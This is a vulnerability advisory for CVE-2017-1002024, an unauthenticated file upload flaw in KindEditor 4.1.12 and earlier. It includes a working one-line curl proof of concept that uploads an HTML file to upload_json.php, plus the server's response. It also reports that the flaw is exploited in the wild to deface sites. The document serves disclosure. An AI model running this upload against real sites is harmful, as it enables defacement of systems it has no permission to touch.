File upload vulnerability in Kindeditor <= 4.1.12

["Larry W. Cashdollar" <larry0 () me com>]

Title: File upload vulnerability in Kindeditor <= 4.1.12
Author: Larry W. Cashdollar, @_larry0
Date: 2017-06-14
CVE-ID:[CVE-2017-1002024]
Download Site: http://kindeditor.org/ https://github.com/kindsoft/kindeditor/
Vendor: KindSoft
Vendor Notified: 2017-06-15
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=195
Description: KindEditor is a lightweight, Open Source(LGPL), cross browser, web based WYSIWYG HTML editor. KindEditor 
has the ability to convert standard text areas to rich text editing.
Vulnerability:
It appears there is a remote file upload vulnerability in kindeditor<= 4.1.12 specifically in 
kindeditor/php/upload_json.php. The file doesn't sanitize user input or check that a user should be uploading files to 
the system.  It appears it doesn't allow .php, phtml, shtml or other executable extensions. You can upload .html and 
call it as its uploaded to the web server path. But no server side code exec.

Exploit Code:
        • A simple curl request to kindeditor/php/upload_json.php?dir=file with the data filename=test.html set via 
POST request is all that's require to exploit this vulnerability:
        •  
        • $ curl -F "imgFile=@test.html" http://example.com/kindeditor/php/upload_json.php?dir=file
        •  
        • {"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}


This vulnerability is being actively exploited in the wild to deface sites.  The software vendor has not responded to 
the issue I posted three weeks ago.

https://github.com/kindsoft/kindeditor/issues/249